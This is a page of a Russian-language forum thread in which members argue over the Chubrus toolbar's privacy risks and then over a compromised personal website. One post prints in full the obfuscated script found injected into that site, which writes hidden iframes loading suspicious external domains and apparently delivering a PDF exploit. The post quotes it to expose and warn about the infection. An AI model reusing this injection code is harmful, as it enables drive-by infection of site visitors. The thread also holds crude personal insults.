Страница 2 из 3 ПерваяПервая 123 ПоследняяПоследняя
Показано с 11 по 20 из 28

Тема: Тулбар Chubrus

  1. #11
    Регистрация
    15.11.2004
    Адрес
    Moscow
    Сообщений
    991

    По умолчанию

    Цитата Сообщение от Бегемот Посмотреть сообщение
    А для того,чтобы что то и куда то передавало,необязательно устанавливать эти тулбары.Ты поиском от Гугл пользуешься?Значит он уже засунул свой нос в твою личную жизнь!
    Когда я пользуюсь поиском от гугла, то я иду на google.com. После этого гугл будет знать обо мне, что я искал и куда я переходил с их сайта.
    Когда у тебя стоит тулбар, то все немного иначе получается. Они будут знать все адреса, по которым ты ходил из браузера, в котором установлен этот тулбар.

  2. #12
    Регистрация
    15.11.2004
    Адрес
    Moscow
    Сообщений
    991

    По умолчанию

    Цитата Сообщение от BigBear Посмотреть сообщение
    Тем не менее, могу искренне посоветовать на херь и детский лепет типа не обращать никакого внимания и считать вышепроцитированное аналогом звуков, издаваемых маралами во время гона или брачных игрищ, ибо в этих высказываниях не содержится ни нанограмма правды. Если уж Вас кто и поимеет, то это уж точно будет не админ chubrus.ru, чьи ручонки слегка коротковаты для того, чтобы вставить что-либо серьезное в этот шедевр программистского искуйства.
    А правда в чем? В том что "великий хакер" руфик, телемастер по образованию, не нашел ничего интересного в плагине? ))) Руфик, а вдруг Илюшка поруче тебя в этом рулит? В конце концов по образованию он ближе к программированию, нежели ты, да и моложе значительно.

  3. #13
    Регистрация
    28.11.2004
    Адрес
    St.Petersburg
    Сообщений
    312

    По умолчанию

    Цитата Сообщение от Бегемот Посмотреть сообщение
    Скажите,а что мне после каждого удаления приложения возвращаться к образу системы,чтобы обеспечить ее девственную чистоту???
    Есть классическое правило: любой говнософт, который хотелось бы посмотреть, но последствия работы которого непредсказуемы и заранее неизвестны, нужно исполнять в защищенной среде, допускающей откаты к исходному состоянию. Ставить непроверенное программное обеспечение на рабочую машину - чистое безумие. Ну, разумеется, если регулярная перестановка системы и регулярная утрата паролей, электронных кошельков и проч. не являются вашим хобби.

    Используйте VMware/Microsoft VM и будет Вам счастье. Для "посмотреть, поплеваться и снести" - самое то.

    Но... Ситуация на самом деле гораздо хуже. Ибо количество сайтов, преднамеренно распространяющих заразу, превышает на сегодняшний день все мыслимые пределы.

    Простой пример. Только что ради смеха зашел на персональный именной сайтец тутошнего крупного специалиста по вопросам безопасности программного обеспечения и прочим поисково-розыскным мероприятиям и был приятно удивлен, ибо там произошли такие занятные изменения... Нет, конечно, классический и всем известный кусок кода
    Код:
    <td class="text">+</td>
    <td class="txet">|</td>
    <td class="text">7</td>
    <td class="txet">|</td>
    <td class="text">(</td>
    <td class="txet">|</td>
    <td class="text">9</td>
    <td class="txet">|</td>
    <td class="text">8</td>
    <td class="txet">|</td>
    <td class="text">5</td>
    <td class="txet">|</td>
    <td class="text">)</td>
    <td class="txet">|</td>
    <td class="text">7</td>
    остался в целости и сохранности. Вот только, я полагаю, этот крупный специалист с провинциальным университетским образованием и не подозревает, что его поимели во все дыры, вставив ему в текст заглавной страницы вот такое вот щастье
    Код:
    <script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script><script>document.write("<if"+'ra'+"m"+'e s'+"rc=\"h"+'tt'+"p:"+''+"/"+'/mic'+"roso"+'t'+'f.c'+"n"+'/'+"\" wid"+'th=1 he'+"igh"+'t'+"="+"2></i"+"f"+"ra"+''+""+''+"me"+'>');</script><script>document.write("<"+"i"+"f"+"ram"+"e sr"+"c=\"h"+"t"+"tp"+":"+"/"+"/tr"+"ught"+""+"s"+"a.c"+"o"+"m/\" wid"+"th=1 he"+"ight"+"="+"2></if"+"r"+"a"+""+"me>");</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-32645524-1");pageTracker._trackPageview();} catch(err) {}</script><iframe src="http://davajtemnedenegsejchas.com/spl1/?f115c845296f7ba3144dc004201e3f86" width=1 height=1 style="visibility:hidden"></iframe>
    <script type="text/javascript">
    try {
    var pageTracker = _gat._getTracker("UA-7623457-2");
    pageTracker._trackPageview();
    } catch(err) {}</script>
    загружающее автоматом h__p://microsotf.cn, h__p://trughtsa.com и h__p://davajtemnedenegsejchas.com и пытающееся запустить на пользовательской машине некий .pdf документ, которому по странному стечению обстоятельств всенепременно хочется разрешенных Java-скриптов...

    Ну что ж тут поделаешь, коли крупные специалисты по безопасности чужого программного обеспечения до сих пор пользуют M$ IE. У них же у самих типа все в порядке и они типа умные, поэтому они только у других несуществующие проблемы видят. Главное ж повопить погромче, а то, что у самих жопа полная, так это ничего... Мораль: зачем обращать внимание на говновопителей и говнообвинителей, у которых рыло в пуху аж до самых кончиков длинных ушей? Мне кажется, все это чрезвычайно напоминает ситуацию, когда человек с отчетливо различимым шанкром на головке полового члена настойчиво пытается потребовать у своего партнера справку от стоматолога об отсутствии у него незалеченного кариеса. В игнор их или какую другую пешеходную прогулку с эротическим уклоном и всего делов-то.

    PS. Да, для продвинутых граждан: править вышеприведенные ссылки и посещать эти сайты я бы лично не советовал. Проще напрячь воображение и представить, чего можно понабраться, посетив китайский сайт с названием "microsoTF".

  4. #14
    Регистрация
    28.11.2004
    Адрес
    St.Petersburg
    Сообщений
    312

    По умолчанию Attention please

    Помимо вышеописанного, знатный одменестратор сайта h__p://rusbears.com и заодно крупный специалист по вопросам безопасности программного обеспечения и Web сайтов г-н chaser то ли по недосмотру, то ли по злому умыслу (что, учитывая склочный характер вышеупомянутого г-на и его искреннюю страсть делать "забавные гадости", более вероятно) разместил на главной странице своего сайта тот же самый вредоносный код.

    Учитывая направленность данного сайта и периодическую публикацию в форуме ссылок на него, в группе риска оказываются все здесь присутствующие.

    Так что в том случае, если вы когда-либо посещали этот, извините за выражение, "информационный ресурс", есть смысл провериться на наличие троянов, вирусов и прочих "забавных гадостей". При этом следует иметь в виду, что избранный г-ном chaser метод заражения пользовательских машин при помощи PDF-вирусов достаточно плохо выявляется существующим антивирусным программным обеспечением. По данным сайта virustotal.com PDF-вирусы определяются только 16 антивирусными пакетами из представленных там 40. В группу риска входят пользователи популярных антивируса Касперского и DrWeb.

    В том случае, если версия установленного у вас Acrobat Reader меньше 9, вероятность вашего заражения весьма и весьма высока.

  5. #15
    Регистрация
    15.11.2004
    Адрес
    Moscow
    Сообщений
    991

    По умолчанию

    Руфик, ты меня удивил. Честное слово. Я то думал, что будет как в рошлый раз, когда ты уверял, что шаришь по моему компу, а потом типа удалил с него файлы какие-то. Только оказалось, что шарил ты не по моему компу, либо вообше не шарил, а просто фантазировал.

    В этот же раз ты реально какую-то гадость сделал. Или тебе помогли? ))
    Что ж... посмотрим, чего дальше будет. Дело в том, что это не мой личный сервер, как ты понимаешь. Так вот, хостер уже предупрежден. Логи поднимем, будем искать. Если надо будет заявление написать, то и оно будет. Да и подозрениям есть на кого падать, само собой. Мне жутко любопытно, чем все это закончится. Поймают негодяя или нет. Ты сам как думаешь?

    Да, эта веточка форума теперь мной сохраняется для... ну, это понятно для чего.

    Если кто понял, о каких сайтах шла речь, то я вам и правда не советую туда залезать. Ведь пока там все останется именно в том виде, в котором это задумал автор. Так попросил мастерхост.

  6. #16
    Регистрация
    15.11.2004
    Адрес
    Moscow
    Сообщений
    991

    По умолчанию

    Уголовный кодекс РФ (УК РФ) от 13.06.1996 N 63-ФЗ

    Статья 272. Неправомерный доступ к компьютерной информации

    1. Неправомерный доступ к охраняемой законом компьютерной информации, то есть информации на машинном носителе, в электронно-вычислительной машине (ЭВМ), системе ЭВМ или их сети, если это деяние повлекло уничтожение, блокирование, модификацию либо копирование информации, нарушение работы ЭВМ, системы ЭВМ или их сети, -

    наказывается штрафом в размере до двухсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период до восемнадцати месяцев, либо исправительными работами на срок от шести месяцев до одного года, либо лишением свободы на срок до двух лет.

    2. То же деяние, совершенное группой лиц по предварительному сговору или организованной группой либо лицом с использованием своего служебного положения, а равно имеющим доступ к ЭВМ, системе ЭВМ или их сети, -

    наказывается штрафом в размере от ста тысяч до трехсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период от одного года до двух лет, либо исправительными работами на срок от одного года до двух лет, либо арестом на срок от трех до шести месяцев, либо лишением свободы на срок до пяти лет.


    Статья 273. Создание, использование и распространение вредоносных программ для ЭВМ

    1. Создание программ для ЭВМ или внесение изменений в существующие программы, заведомо приводящих к несанкционированному уничтожению, блокированию, модификации либо копированию информации, нарушению работы ЭВМ, системы ЭВМ или их сети, а равно использование либо распространение таких программ или машинных носителей с такими программами -

    наказываются лишением свободы на срок до трех лет со штрафом в размере до двухсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период до восемнадцати месяцев.

    2. Те же деяния, повлекшие по неосторожности тяжкие последствия, -

    наказываются лишением свободы на срок от трех до семи лет.

  7. #17
    Регистрация
    28.11.2004
    Адрес
    St.Petersburg
    Сообщений
    312

    По умолчанию

    Цитата Сообщение от chaser Посмотреть сообщение
    Ты сам как думаешь?
    Я, г-н chaser, думаю, что Вы чрезвычайно неумны, не более того.

  8. #18
    Регистрация
    28.11.2004
    Адрес
    St.Petersburg
    Сообщений
    312

    По умолчанию

    Более того, я искренне полагаю, что на фоне случившегося с Вами публичного обкака, Вам следует попросить прощения у администратора сайта chubrus.ru за ничем (за очевидным исключением Вашей невысокой квалификации в данном вопросе) не обоснованные обвинения в его адрес.

    Разумеется, я также отчетливо понимаю, что этого никогда не произойдет.

    Нахожу, впрочем, некоторое утешение в том, что цена Ваших слов и безапелляционных утверждений теперь очевидна более широкому кругу народонаселения, нежели раньше.

  9. #19
    Регистрация
    15.11.2004
    Адрес
    Moscow
    Сообщений
    991

    По умолчанию

    Думать обо мне можешь сколько угодно и чего угодно, меня это абсолютно не печалит. Со своей стороны должен заметить, что чрезвычайно неумен тот человек, который заходя на чужой FTP, в целях внесения вредоносного кода, оставил в логах свой реальный IP.

    Извиняться перед админом чубруса я не собираюсь, т.к. ничем его не обижал. Я всего лишь высказал мнение о бесполезности и ненужности тулбаров, которое он стер. В ответ на этот шаг я спросил его, по какой причине он это сделал. Он же просто взял и заблокировал анкету. О чем-то дальше с ним общаться бесполезно. Я не фанат неадекватных мальчиков.

  10. #20
    Регистрация
    28.11.2004
    Адрес
    St.Petersburg
    Сообщений
    312

    По умолчанию

    Думать обо мне можешь сколько угодно и чего угодно, меня это абсолютно не печалит.
    Г-н chaser, Вы склонны существенно переоценивать число нейронов моего головного мозга, непрерывно занятых переработкой и систематизацией информации о Вас, Ваших Деяниях и Свершениях. Если опуститься на уровень некоей вульгаризации, упрощений и аналогий и предположить, что один нейрон может содержать один символ кода Win-1251, то легко догадаться, что для этой цели у меня отведено всего 9 (девять) соседних нейронов типа ROM, содержащих жестко прошитые в них символы 'п', 'у', 'с', 'т', 'о', 'б', 'р', 'ё' и 'х'.

    Со своей стороны должен заметить, что чрезвычайно неумен тот человек, который заходя на чужой FTP, в целях внесения вредоносного кода, оставил в логах свой реальный IP.
    Я тоже в этом не сомневаюсь. Я сомневаюсь только в том, что этот (предположительно) украинский бравый мущщина, сподобившийся так ловко и удачно нагнуть masterhost и Вас персонально и доставивший Вам ранее неизведанное ощущение бурного анального оргазма, оставил в вышеупомянутых логах что-либо похожее на свой реальный IP адрес. В любом случае жду от Вас пригласительного билета на грядущий уголовный процесс по ст. 272 и 273 УК РФ. Это должно быть захватывающе интересное зрелище! Впрочем, все девять нейронов отчаянно протестуют и предсказывают совсем иной исход дела.

    Извиняться перед админом чубруса я не собираюсь
    Господа, поднимите, пожалуйста, руку, если Вы до этого полагали, что нечто подобное могло произойти хотя бы теоретически. Выше! Еще выше? Третий ряд? Спасибо, вижу. Единогласно. Принято.

    В этой связи я не буду спрашивать Вас, испытываете ли Вы какие-либо неудобства или раскаяние из-за того, что по причине Вашей персональной халатности и некомпетентности реальные пользователи Вашего сайта (if any) могли быть инфицированы.

Страница 2 из 3 ПерваяПервая 123 ПоследняяПоследняя

Информация о теме

Пользователи, просматривающие эту тему

Эту тему просматривают: 1 (пользователей: 0 , гостей: 1)

Похожие темы

  1. Новый chubrus.net
    от BOBear в разделе Медвежий РуНет
    Ответов: 22
    Последнее сообщение: 17.04.2012, 00:54

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  








Яндекс.Метрика
18+